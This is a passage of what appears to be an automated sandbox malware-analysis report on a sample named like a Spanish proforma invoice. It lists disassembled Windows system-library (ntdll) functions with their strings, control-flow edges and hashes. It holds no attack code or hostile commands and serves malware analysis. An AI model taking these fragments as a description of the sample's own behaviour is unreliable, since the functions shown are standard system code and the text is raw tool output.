367d985e-367d9864 708->714 715 367d9859-367d985c 708->715 713->668 714->674 721 367d9866 714->721 715->665 722 367d95dd-367d960b RtlDebugPrintTimes 717->722 718->722 720->643 721->665 722->593 726 367d9611-367d9617 722->726 724->677 726->652
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $ $0
                                                  • API String ID: 3446177414-3352262554
                                                  • Opcode ID: c59362be31849d85e81505df1e23b3d884bd650e7c878afa57069f3dc5fcb297
                                                  • Instruction ID: f811b6bc50cb110fa9c73bb150a42cd2271b420c4cfb34a19287898980705d76
                                                  • Opcode Fuzzy Hash: c59362be31849d85e81505df1e23b3d884bd650e7c878afa57069f3dc5fcb297
                                                  • Instruction Fuzzy Hash: CA3246B1A083819FE350CF69C884B5BBBE5BF88744F804D2EF5998B250D775E948CB52
                                                  Function 36768540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 797 36768540-367685a1 798 367685a7-367685b8 797->798 799 367a50a2-367a50a8 797->799 799->798 800 367a50ae-367a50bb GetPEB 799->800 800->798 801 367a50c1-367a50c4 800->801 802 367a50e1-367a5107 call 36772c00 801->802 803 367a50c6-367a50d0 801->803 802->798 808 367a510d-367a5111 802->808 803->798 804 367a50d6-367a50df 803->804 806 367a5138-367a514c call 367353c0 804->806 813 367a5152-367a515e 806->813 808->798 810 367a5117-367a512c call 36772c00 808->810 810->798 819 367a5132 810->819 815 367a5367-367a5373 call 367a5378 813->815 816 367a5164-367a5178 813->816 815->798 817 367a517a 816->817 818 367a5196-367a520c 816->818 821 367a517c-367a5183 817->821 825 367a520e-367a5240 call 3672fcf0 818->825 826 367a5245-367a5248 818->826 819->806 821->818 824 367a5185-367a5187 821->824 827 367a5189-367a518c 824->827 828 367a518e-367a5190 824->828 837 367a5358-367a535d call 367ba130 825->837 830 367a524e-367a529f 826->830 831 367a531f-367a5322 826->831 827->821 828->818 832 367a5360-367a5362 828->832 838 367a52d9-367a531d call 3672fcf0 * 2 830->838 839 367a52a1-367a52d7 call 3672fcf0 830->839 831->832 833 367a5324-367a5353 call 3672fcf0 831->833 832->813 833->837 837->832 838->837 839->837
                                                  Strings
                                                  • Address of the debug info found in the active list., xrefs: 367A52B9, 367A5305
                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 367A534E
                                                  • Critical section address, xrefs: 367A5230, 367A52C7, 367A533F
                                                  • double initialized or corrupted critical section, xrefs: 367A5313
                                                  • Critical section address., xrefs: 367A530D
                                                  • Invalid debug info address of this critical section, xrefs: 367A52C1
                                                  • undeleted critical section in freed memory, xrefs: 367A5236
                                                  • corrupted critical section, xrefs: 367A52CD
                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 367A52ED
                                                  • Thread identifier, xrefs: 367A5345
                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 367A5215, 367A52A1, 367A5324
                                                  • Critical section debug info address, xrefs: 367A522A, 367A5339
                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 367A52D9
                                                  • 8, xrefs: 367A50EE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                  • API String ID: 0-2368682639
                                                  • Opcode ID: 899afecc240182b1cfead50c2ff7723bedc814f215c9d1dacf9159f70490fc23
                                                  • Instruction ID: f51e78ec402e3d7dbbaf527c82a0b1e12465c0c0fecc93d4a6211ceb8336964d
                                                  • Opcode Fuzzy Hash: 899afecc240182b1cfead50c2ff7723bedc814f215c9d1dacf9159f70490fc23
                                                  • Instruction Fuzzy Hash: 02817DB1901318AFEB10CFA5CC44BAEBBB5FB48754FA0425AF944BB241C778A945CB60
                                                  Function 367DFDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                  • API String ID: 3446177414-1700792311
                                                  • Opcode ID: 6ddb48e5ef2cb1c796187a31c61ff07758120460ce283eac8e2a2cf9fb7e08c9
                                                  • Instruction ID: acd65ad363657bf4dd04f333d52b0bb4a7c27069465cf35bb6c6f06b54da6410
                                                  • Opcode Fuzzy Hash: 6ddb48e5ef2cb1c796187a31c61ff07758120460ce283eac8e2a2cf9fb7e08c9
                                                  • Instruction Fuzzy Hash: BDD11E79910685DFDB02CFA4C808AADBBF2FF49714F848449E984AF212C739D956CF61
                                                  Function 3672D2EC Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.u6
                                                  • API String ID: 0-3276589498
                                                  • Opcode ID: e52ed7e93e6ac61df3311c10311df9c9b27127ab59a319177687cacc268cbc2b
                                                  • Instruction ID: be1803a94c6f3b3fe05d54fb75459916ebc7a358cf90b6c41809f74284f0e1d2
                                                  • Opcode Fuzzy Hash: e52ed7e93e6ac61df3311c10311df9c9b27127ab59a319177687cacc268cbc2b
                                                  • Instruction Fuzzy Hash: 42B18FB59083519FD711CF25C884A6FB7E9AF84754F81492EF994DB200EBB0D948CB92
                                                  Function 367D86C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                  • API String ID: 0-2515994595
                                                  • Opcode ID: 9b0e4a8f5f68e91b26858e37f86d572b613afb360f19dab68b430773285c5c3d
                                                  • Instruction ID: 1d6140349b790ae722bac25e7ce22ef9ea736790e56af64f08d9f05428d06f6b
                                                  • Opcode Fuzzy Hash: 9b0e4a8f5f68e91b26858e37f86d572b613afb360f19dab68b430773285c5c3d
                                                  • Instruction Fuzzy Hash: E95190B59143119BE315DF198C48BABB7EDEF84354F90491DBA98CB151E730D604CBE2
                                                  Function 367DF0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                  • API String ID: 3446177414-1745908468
                                                  • Opcode ID: a29ca950aa6a500d07b62ecacc5754dceee07bc16277ff7202afb1a3229a039e
                                                  • Instruction ID: c8ce3860f597a9def68b9d6851cd2e26520f3282084268d331a8a77631e1f23b
                                                  • Opcode Fuzzy Hash: a29ca950aa6a500d07b62ecacc5754dceee07bc16277ff7202afb1a3229a039e
                                                  • Instruction Fuzzy Hash: 89911275900784DFDB01CFB5C854AADBBF2FF49714F94885AE940AF251CB399942CB21
                                                  Function 3672640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlDebugPrintTimes.NTDLL ref: 3672651C
                                                    • Part of subcall function 36726565: RtlDebugPrintTimes.NTDLL ref: 36726614
                                                    • Part of subcall function 36726565: RtlDebugPrintTimes.NTDLL ref: 3672665F
                                                  Strings
                                                  • LdrpInitShimEngine, xrefs: 36789783, 36789796, 367897BF
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 367897A0, 367897C9
                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 367897B9
                                                  • apphelp.dll, xrefs: 36726446
                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3678977C
                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 36789790
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-204845295
                                                  • Opcode ID: 8b18b9a73d6cf9da9cd51afb7ccf03c7566a0cf9f42108cbcfc2dc41a636a56e
                                                  • Instruction ID: 9a4947a5053a96ced5d171bb4927b4c654475611a3bddd71028f0cac68250ea4
                                                  • Opcode Fuzzy Hash: 8b18b9a73d6cf9da9cd51afb7ccf03c7566a0cf9f42108cbcfc2dc41a636a56e
                                                  • Instruction Fuzzy Hash: B4519D716083009FE720CF25CC95B6A7BE9EB84644F90492AFA949F261EB34DD45CB93
                                                  Function 3672D02D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3672D0E6
                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 3672D136
                                                  • @, xrefs: 3672D2B3
                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3672D06F
                                                  • @, xrefs: 3672D09D
                                                  • h.u6, xrefs: 3678A5D2
                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3672D263
                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3672D202
                                                  • @, xrefs: 3672D24F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.u6
                                                  • API String ID: 0-183300548
                                                  • Opcode ID: f78f3fc044d41634462ce32143d6c0a7bc9c042c2bc5f11861819418059273c2
                                                  • Instruction ID: 0f6aa9addf952da108787feb134fc3557c2b8c47d99f992b8bff031c812106a3
                                                  • Opcode Fuzzy Hash: f78f3fc044d41634462ce32143d6c0a7bc9c042c2bc5f11861819418059273c2
                                                  • Instruction Fuzzy Hash: 1AA1C2B18083059FE721CF11C884B5BB7E9BF84755F91492EFA989A240D774D948CF93
                                                  Function 3675D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlDebugPrintTimes.NTDLL ref: 3675D879
                                                    • Part of subcall function 36734779: RtlDebugPrintTimes.NTDLL ref: 36734817
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-1975516107
                                                  • Opcode ID: f527ab91253ca1569c0b62c85fd156f8d1155525e1e736f1e2fa0a3d665b6a8c
                                                  • Instruction ID: 3493fec478f607a927fe8d2ec9a74b177aaed90e3f8f99d2a649e42fbb82a159
                                                  • Opcode Fuzzy Hash: f527ab91253ca1569c0b62c85fd156f8d1155525e1e736f1e2fa0a3d665b6a8c
                                                  • Instruction Fuzzy Hash: A551F275E043459FEB04CFA4C84879DBBF2BF48714FA18599DA006F281D774A982CBC6
                                                  Function 367DF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                  • API String ID: 0-2224505338
                                                  • Opcode ID: fe38e45c96cd8f32f4d0ef47166a09d88830dc7c2935b35c826bfb7d43aee534
                                                  • Instruction ID: 7acf2dffd1a0bbad09adca468c8267a55b7cf3510410167d97aa8cf8aa00bffa
                                                  • Opcode Fuzzy Hash: fe38e45c96cd8f32f4d0ef47166a09d88830dc7c2935b35c826bfb7d43aee534
                                                  • Instruction Fuzzy Hash: BA517576511244EFE301CF64C968E6A7BF5EF04AA8FD08895F501AF612CB38D951CE61
                                                  Function 367B8633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • HandleTraces, xrefs: 367B890F
                                                  • VerifierDlls, xrefs: 367B893D
                                                  • VerifierFlags, xrefs: 367B88D0
                                                  • VerifierDebug, xrefs: 367B8925
                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 367B86E7
                                                  • AVRF: -*- final list of providers -*- , xrefs: 367B880F
                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 367B86BD
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                  • API String ID: 0-3223716464
                                                  • Opcode ID: a74b37980a47040c6f1362defd40d8cc248021e71c33f3e3b5f49d1086964d1a
                                                  • Instruction ID: 76a7cf4b2e5dafddec168578697ff31695539549396c53b2cf43826aeb9b2d4a
                                                  • Opcode Fuzzy Hash: a74b37980a47040c6f1362defd40d8cc248021e71c33f3e3b5f49d1086964d1a
                                                  • Instruction Fuzzy Hash: BB9121B2A01311AFEB11DF658C84B2A7B96EB48B58FC58559FA406F281C730DC45CBE3
                                                  Function 3675237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 3679A7AF
                                                  • DGp6, xrefs: 36752382
                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3679A79F
                                                  • LdrpDynamicShimModule, xrefs: 3679A7A5
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DGp6$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-2939573604
                                                  • Opcode ID: 5b3661bc14e96d8f79c61ae771b9b187a3be2696010eb137128c409a75247d3d
                                                  • Instruction ID: 74c106290b5282dac25fade37aed91943f061bea25ecbed68f4ce247cea405d6
                                                  • Opcode Fuzzy Hash: 5b3661bc14e96d8f79c61ae771b9b187a3be2696010eb137128c409a75247d3d
                                                  • Instruction Fuzzy Hash: EB312C75D00240EFE7149F29C885F9977F6EB88F50FA48059EA10BF241DBB09882CB90
                                                  Function 3674B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                  • API String ID: 0-122214566
                                                  • Opcode ID: 708f7665a7b60f6ff663c7b000834ceeb7f3944cff2883f6996736b36777f676
                                                  • Instruction ID: 273c8356f976d371faeecf747dd83719e51c630009d14baf8b540c5e6d85fd5c
                                                  • Opcode Fuzzy Hash: 708f7665a7b60f6ff663c7b000834ceeb7f3944cff2883f6996736b36777f676
                                                  • Instruction Fuzzy Hash: F2C12271E003159BEB16DB66CC9CBBE77B2AF45B04FE08069E901AF290DB748C44C391
                                                  Function 3676631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-792281065
                                                  • Opcode ID: 317543954a6dcc8fb8c6466cc1b314694b6f166e110bcccd5e925860ae14c1a4
                                                  • Instruction ID: 05270ec71dfb2ae6316d9c4271f459a163cf6e7a300e32efd5a715c2fbadee7f
                                                  • Opcode Fuzzy Hash: 317543954a6dcc8fb8c6466cc1b314694b6f166e110bcccd5e925860ae14c1a4
                                                  • Instruction Fuzzy Hash: 99912770A11354DFEB24CF26CC58B6A7B62EB05B68FD04269EF106F381D7749841CBA6
                                                  Function 3676C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • LdrpInitializeProcess, xrefs: 3676C5E4
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 3676C5E3
                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 367A7FF0
                                                  • LdrpInitializeImportRedirection, xrefs: 367A7F82, 367A7FF6
                                                  • Loading import redirection DLL: '%wZ', xrefs: 367A7F7B
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 367A7F8C, 367A8000
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 0-475462383
                                                  • Opcode ID: 9586f9ca9d1e7fe637e4dfe1f2a24dc4d57b8d7135338a2104a18ba9cbe3bbe7
                                                  • Instruction ID: 6171724b1344baedb61eea2f1e20193c9da74725180406c9aa3b9a374072081c
                                                  • Opcode Fuzzy Hash: 9586f9ca9d1e7fe637e4dfe1f2a24dc4d57b8d7135338a2104a18ba9cbe3bbe7
                                                  • Instruction Fuzzy Hash: 4D3102716043019FC214DF29DC49E2ABBD5EF84A14F854998FA84AF392E720DC05CBA3
                                                  Function 36762594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 367A1F8A
                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 367A1FA9
                                                  • RtlGetAssemblyStorageRoot, xrefs: 367A1F6A, 367A1FA4, 367A1FC4
                                                  • SXS: %s() passed the empty activation context, xrefs: 367A1F6F
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 367A1F82
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 367A1FC9
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                  • API String ID: 0-861424205
                                                  • Opcode ID: 5f5bc369b30c256f5ea68e61283bca334a840b214b49e33b5dd58602862cb40b
                                                  • Instruction ID: 5f219d6477323faa3d19cefed2b0b83a0535e1a1c0cae05f047e95d6a81059e0
                                                  • Opcode Fuzzy Hash: 5f5bc369b30c256f5ea68e61283bca334a840b214b49e33b5dd58602862cb40b
                                                  • Instruction Fuzzy Hash: 7E31D276E013247BFB108A87DC49F9A7E699B40698FC0819AB9117F341D734EA01CFE6
                                                  Function 36740680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
